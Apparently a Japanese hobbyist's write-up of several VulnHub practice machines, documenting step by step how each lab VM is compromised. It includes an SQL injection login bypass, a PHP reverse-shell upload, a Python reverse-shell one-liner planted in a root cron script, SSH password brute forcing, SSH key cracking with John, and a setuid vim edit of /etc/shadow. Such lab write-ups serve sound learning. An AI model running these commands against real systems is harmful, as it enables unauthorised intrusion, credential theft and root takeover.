else{
document.loginform.submit();
}
}
</script>
パスワードにシングルクォーテーションが含まれていると拒否されて、
メールアドレスに「@btrisk.com」が含まれていないと許されないよう。
以上を満たせば、適当な値でログインできるぽい?
その遷移先ページは
# curl 10.10.10.12/personel.php
(snip)
<script type="text/javascript">
// accept=".jpg,.png"
function getFile(){
var filename = document.getElementById("dosya").value;
var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
document.myform.submit();
}else{
//mesaj
alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
return false;
}
}
</script>
ファイルアップロードスクリプトがある?
スクリプトを動かす、ボタン等が見つからない。
改めて、login.phpへ戻る。
色々ログインを試していたら、「@btrisk.com」の前ならシングルクォーテーションを利用できる。
メールアドレスに「' or '1'='1'-- @btrisk.com」でSQLi通った模様。
SQLiが刺さればログインできたようで、getFile()のボタンを発見。
リバシェphpは、いつものpentestmonkeyのやつ「/usr/share/webshells/php/php-reverse-shell.php」
reverse-shellするphpファイルをアップロードしようとすると「jpg,gif,png」じゃないからダメと言われる。
しかし、画像ファイルじゃないとダメだという判断はjavascriptがサーバ側でなくクライアント側で行っているので、ブラウザのコンソールでgetFile()を弄ってやれば回避可能。
自分の場合、参照にファイルをセットした後、ブラウザのコンソールから「document.myform.submit();」を叩いてやることでuploadした。
さて、アップロードしたファイルはどこにアップロードされるのか。
それはやはり、「/uploads/」に決まっている。
実際、アップロード後に確認して見るとファイルが上がっている。
shell getchu!
window 1 # nc -nlvp 443
window 2 # curl 10.10.10.12/uploads/reverse.php
window 1 Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux 19:00:23 up 11:28, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
他に、「/javascript/」は「Forbidden」だったが、
「/javascript/jquery/jquery」と「/javascript/jquery/version」は何故か200である。
after shell getchu
sqlデータベースにある資格情報の利用
まずは、先ほど見れなかった「config.php」を見に行く。
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@BTRsys1:/var/www/html$ cd /var/www/html/
cd /var/www/html/
www-data@BTRsys1:/var/www/html$ ls
ls
assets gonder.php index.php personel.php uploads
config.php hakkimizda.php login.php sorgu.php
www-data@BTRsys1:/var/www/html$ cat config.php
cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
{
echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
}
/////////////////////////////////////////////////////////////////////////////////////////
?>
www-data@BTRsys1:/var/www/html$
まさかmysqlのroot起動によるのroot権限奪取か?
www-data@BTRsys1:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: toor
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 361
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select sys_exec("id");
select sys_exec("id");
ERROR 1305 (42000): FUNCTION sys_exec does not exist
そんなことは無かったので色々見ていく。
mysql> show database; show database; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1 mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | deneme | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.00 sec) mysql> use information_schema; use information_schema; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | | INNODB_BUFFER_PAGE | | INNODB_TRX | | INNODB_BUFFER_POOL_STATS | | INNODB_LOCK_WAITS | | INNODB_CMPMEM | | INNODB_CMP | | INNODB_LOCKS | | INNODB_CMPMEM_RESET | | INNODB_CMP_RESET | | INNODB_BUFFER_PAGE_LRU | +---------------------------------------+ 40 rows in set (0.00 sec) mysql> use deneme; use deneme; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +------------------+ | Tables_in_deneme | +------------------+ | user | +------------------+ 1 row in set (0.00 sec) mysql> select * from user; select * from user; +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | ID | Ad_Soyad | Kullanici_Adi | Parola | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | 1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet | muhasebe | nazli | lokantaci | 5 | | 2 | can demir | cdmir@btrisk.com | asd123*** | mahmut | memur | gulsah | tuhafiyeci | 8 | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ 2 rows in set (0.00 sec) mysql>
これは色々使えそうな情報では?
www-data@BTRsys1:/var/www/html$ su - su - Password: asd123*** root@BTRsys1:~# id id uid=0(root) gid=0(root) groups=0(root)
root shell getchu!!
cronを見た
「find / -perm -2 -type f 2>/dev/null」という面白いコマンドを見つけたので早速使って見る。
www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null find / -perm -2 -type f 2>/dev/null /var/tmp/cleaner.py.swp /var/log/cronlog (snip) /lib/log/cleaner.py
結果は殆どどうでも良いが、面白いものを発見。
「/var/log/cronlog」,「/lib/log/cleaner.py」とは一体何なのだろうか。
www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog
cat /var/log/cronlog
*/2 * * * * cleaner.py
www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py
cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner
ls -al /lib/log/ | grep cleaner
-rwxrwxrwx 1 root root 96 Aug 13 2014 cleaner.py
「clearner.py」を書き換えてやればroot取れる。
今回は以下への書き換えを行う。
#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
「LHOST」と「LPORT」はお好みで。
attacker # python -m SimpleHTTPServer 80
victim www-data@BTRsys1:/var/www/html$ cd /lib/log cd /lib/log www-data@BTRsys1:/lib/log$ cd /tmp cd /tmp www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py wget 10.10.10.3/getroot.py --2020-05-09 20:03:17-- http://10.10.10.3/getroot.py Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 238 [text/plain] Saving to: 'getroot.py' 100%[======================================>] 238 --.-K/s in 0s 2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238] www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py cp ./getroot.py /lib/log/cleaner.py www-data@BTRsys1:/tmp$
attacker (cron待ち) # nc -nlvp 8080 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::8080 Ncat: Listening on 0.0.0.0:8080 Ncat: Connection from 10.10.10.12. Ncat: Connection from 10.10.10.12:56889. /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root)
「/tmp」下だと、タイミングが悪いとcleaner.pyに 消される可能性があるので「/var/www/html/uploads」で作業する方が良いかもしれない。
学び
- 「find / -perm -2 -type f 2>/dev/null」は偉大では!?
vulnhub Basic Pentesting 2 雑記
Basic pentesting 2
圧縮されたファイルを開くとovaファイルが出てきたが、ovaを読み込むだけでは内部ネットワークにリンクアップしてくれなかった。
この設定環境での話
起動時に「recovery mode」を選択して、「network Enable networking」を選択するとリンクアップした。
電源付けたり消したりする場合は自動設定する必要がある。
サービス調査
# nmap -Pn -p- 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT Nmap scan report for 10.10.10.11 Host is up (0.00011s latency). Not shown: 65529 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 8009/tcp open ajp13 8080/tcp open http-proxy MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds # nmap -Pn -p22,80,139,445,8009,8080 -sV --version-all 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT Nmap scan report for 10.10.10.11 Host is up (0.00081s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 9.0.7 MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC) Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
気になりどころ
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
- [port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 8009] ajp13 Apache Jserv (Protocol v1.3)
- [port 8080] http Apache Tomcat 9.0.7
今回は春のApache祭りですか。
詳細
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
いつだかも「Username Enumeration」しかねーじゃんってなった気がする。
ブルートフォースアタックはスマートじゃないので無し。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.11
+ Target Hostname: 10.10.10.11
+ Target Port: 80
+ Start Time: 2020-05-04 23:48:50 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-05-04 23:49:15 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.11
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 4 23:49:46 2020
URL_BASE: http://10.10.10.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.11/ ----
==> DIRECTORY: http://10.10.10.11/development/
+ http://10.10.10.11/index.html (CODE:200|SIZE:158)
+ http://10.10.10.11/server-status (CODE:403|SIZE:299)
---- Entering directory: http://10.10.10.11/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon May 4 23:49:50 2020
DOWNLOADED: 4612 - FOUND: 2
# dirb http://10.10.10.11/development/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 4 23:50:03 2020
URL_BASE: http://10.10.10.11/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.11/development/ ----
-----------------
END_TIME: Mon May 4 23:50:07 2020
DOWNLOADED: 4612 - FOUND: 0
「/development」が怪しい。
# curl http://10.10.10.11 <html> <h1>Undergoing maintenance</h1> <h4>Please check back later</h4> <!-- Check our dev note section if you need to know what to work on. --> </html>
「/development/」に、「dev.txt」と「j.txt」を発見。
# curl http://10.10.10.11/development/dev.txt 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J # curl http://10.10.10.11/development/j.txt For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K
Apache Struts?
「struts」とは「Apache Struts」のこと?
であるならば、「Apache Struts 2.5.12」を使っているということになりそう。
# searchsploit apache (snip) Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | exploits/linux/remote/42627.py
exploit codeは見つかったけどターゲットが分からんので保留。
+ # -*- coding: utf-8 -*- # pip install requests
K曰くJのパスワードハッシュが脆弱?
/etc/shadowへのディレクトリトラバーサルの示唆を感じたが分からなかった。
[port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# smbclient -L 10.10.10.11
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
このSambaは「Samba Server 4.3.11-Ubuntu」
そういえば、smbclient上手くいったことなかったけど匿名ログインが有効の時しか上手くいかないのでは。
# enum4linux 10.10.10.11
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 5 00:25:23 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.11
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
(snip)
=====================================
| OS information on 10.10.10.11 |
=====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.11 from smbclient:
[+] Got OS info for 10.10.10.11 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
(snip)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
============================================
| Getting printer info for 10.10.10.11 |
============================================
No printers returned.
enum4linux complete on Tue May 5 00:25:38 2020
「kay」と「jan」でログイン試行上手くいかず。
hudraにはユーザがいないと言われた。
exploitはローカルじゃないと上手くいかないぽいので断念。
分からん。
[port 8009] ajp13 Apache Jserv (Protocol v1.3)
こいつ自体はあまり注目せず、Tomcatを確認すべき?
[port 8080] http Apache Tomcat 9.0.7
# nikto -h 10.10.10.11 -p 8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.11
+ Target Hostname: 10.10.10.11
+ Target Port: 8080
+ Start Time: 2020-05-05 00:49:02 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8169 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-05-05 00:49:33 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.11:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 5 00:49:59 2020
URL_BASE: http://10.10.10.11:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.11:8080/ ----
+ http://10.10.10.11:8080/docs (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/examples (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://10.10.10.11:8080/host-manager (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Tue May 5 00:50:03 2020
DOWNLOADED: 4612 - FOUND: 5
とりあえず「/manager/html」にhydraしておく。
(結果長すぎて諦め)
でも、PUTできるってことは本命はそっちなんだろうか。
いや。PUT出来んかった。
よく分からんのでsshに辞書する
janのパスワード弱いって何だったんだ。未だに分からん。
sshやってみるぐらいしかないかなぁ。
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.10.11 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. (snip) [22][ssh] host: 10.10.10.11 login: jan password: armando 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-05 06:02:33
え~、パスワードハッシュ弱いってsshの辞書攻撃で良かったんかぁ。
# ssh jan@10.10.10.11 The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.11' (ECDSA) to the list of known hosts. jan@10.10.10.11's password: (snip) Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102 jan@basic2:~$ id uid=1001(jan) gid=1001(jan) groups=1001(jan) jan@basic2:~$ sudo -l [sudo] password for jan: Sorry, user jan may not run sudo on basic2.
sudo 許されず。
apacheのパスワードファイル見つからんなぁ。
jan@basic2:/home/kay$ ls -al /home/jan/ total 12 drwxr-xr-x 2 root root 4096 Apr 23 2018 . drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw------- 1 root jan 47 Apr 23 2018 .lesshst jan@basic2:/home/kay$ ls -al /home/kay/ total 48 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 . drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw------- 1 kay kay 756 Apr 23 2018 .bash_history -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc drwx------ 2 kay kay 4096 Apr 17 2018 .cache -rw------- 1 root kay 119 Apr 23 2018 .lesshst drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful -rw------- 1 root kay 538 Apr 23 2018 .viminfo -rw------- 1 kay kay 57 Apr 23 2018 pass.bak
なんだかkayのディレクトリは充実しているな。
あれ、sshあるってことはログインできるかもしれない。
jan@basic2:/home/kay$ ls -al ./.ssh total 20 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 . drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .. -rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys -rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa -rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
# scp jan@10.10.10.11:/home/kay/.ssh/id_rsa ./sshkey jan@10.10.10.11's password: id_rsa 100% 3326 293.3KB/s 00:00 # ssh -i sshkey kay@10.10.10.11 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for 'sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "sshkey": bad permissions kay@10.10.10.11's password:
パスワード必要か。
# ls /usr/share/john/ | grep ssh ssh2john.py # /usr/share/john/ssh2john.py sshkey > kayssh # john --wordlist=/usr/share/wordlists/rockyou.txt kayssh Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (sshkey) Warning: Only 1 candidate left, minimum 2 needed for performance. 1g 0:00:00:12 DONE (2020-05-05 07:19) 0.08230g/s 1180Kp/s 1180Kc/s 1180KC/s *7¡Vamos! Session completed
はい、これでいけますね。
# ssh -i sshkey kay@10.10.10.11 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0777 for 'sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "sshkey": bad permissions kay@10.10.10.11's password:
ローカルに落としたprivatekeyだとログインだめらしいので、janで改めてログインしてからsshログイン。
jan@basic2:/home/kay$ ssh -i ./.ssh/id_rsa kay@10.10.10.11 Could not create directory '/home/jan/.ssh'. The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts). Enter passphrase for key './.ssh/id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$ sudo -l [sudo] password for kay: Sorry, try again. [sudo] password for kay: sudo: 1 incorrect password attempt
そういや、kayのパスワード知らんからrootまでいかんね。
kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$
さっきは見えなかったけどこれなんだ。
kay@basic2:~$ cat .bash_history ls -al cat pass.bak cat /dev/null > .bash_history sudo su ls -al cat /dev/null > .bash_history cd /tmp ls -al cd /home/jan ls -al sudo less .viminfo sudo cat /dev/null > .viminfo sudo rm .viminfo less .lesshst sudo less .lesshst cd /home/kay/ ls -al less .bash less .bash_history exit /bin/less /etc/shadow which /bin/less /bin/less /bin/less /etc/passwd sh sudo chmod u-s /bin/less /bin/less ls -al /bin/les ls -al /bin/less sudo chmod u-s /bin/nc.traditional which nc.traditional ls -al /bin/nc* find / -perm -u=s -type f 2>/dev/null which vim sudo chmod u+s /usr/bin/vim ls -al /usr/bin/vim vim /etc/passwd ls -al ls -al /bin/vim vim /etc/shadow vim /etc/passwd cat /etc/passwd vi /etc/passwd cat /etc/passwd ls -al /etc/passwd ifconfig exit
こいつ、/etc/shadowさわれんじゃん。
と思ったが、sudoが必要だったぽい。
いや、でも「sudo chmod u+s /usr/bin/vim」、ここでvimにsetuidしてるぞ。
kay@basic2:~$ openssl passwd -1 pass $1$Yls/Q7aH$lOuA2MSt/Of1BFGaB7NC9. kay@basic2:~$ vim /etc/shadow kay@basic2:~$ sudo su [sudo] password for kay: root@basic2:/home/kay# id uid=0(root) gid=0(root) groups=0(root)
shadowのkayのパスワードを書き換えてしまえ。
:wq!で文句言われるけどsetuidのおかげで反映できちゃうんだよなぁ。
pass.bakの真実
kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$ kay@basic2:~$ sudo su [sudo] password for kay: root@basic2:/home/kay# id uid=0(root) gid=0(root) groups=0(root)
kayのパスワードだった。
おまけ
root@basic2:/home/kay# cd /root root@basic2:~# ls flag.txt root@basic2:~# cat flag.txt Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all! If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators. Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach out to me. Happy hacking!
終わり
- johnのコマンド登録されていないモジュールが「/usr/share/john」にあった 。
- apacheパスワードからのアプローチがあるんじゃないかと思ったのだが。
vulnhub Basic Pentesting 1 雑記
Basic Pentesting 1
サービス調査
# nmap -p- 10.10.10.10 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:43 EDT Nmap scan report for 10.10.10.10 Host is up (0.00035s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.10 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:44 EDT Nmap scan report for 10.10.10.10 Host is up (0.00093s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds
なんか今回早い。
気になりどころ
- [port 21] ftp ProFTPD 1.3.3c
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
詳細
[port 21] ftp ProFTPD 1.3.3c
# searchsploit proftpd
----------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | exploits/linux/remote/15662.txt
(snip)
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow | exploits/linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution | exploits/linux/remote/15449.pl
(snip)
早速刺さりそうなのを発見。
下二つは刺さらず。
一番刺さりそうなやつの中身を確認
# cat 15662.txt
== ProFTPD Compromise Report ==
On Sunday, the 28th of November 2010 around 20:00 UTC the main
distribution server of the ProFTPD project was compromised. The
attackers most likely used an unpatched security issue in the FTP daemon
to gain access to the server and used their privileges to replace the
source files for ProFTPD 1.3.3c with a version which contained a backdoor.
The unauthorized modification of the source code was noticed by
Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on
Wednesday, December 1 and fixed shortly afterwards.
The fact that the server acted as the main FTP site for the ProFTPD
project (ftp.proftpd.org) as well as the rsync distribution server
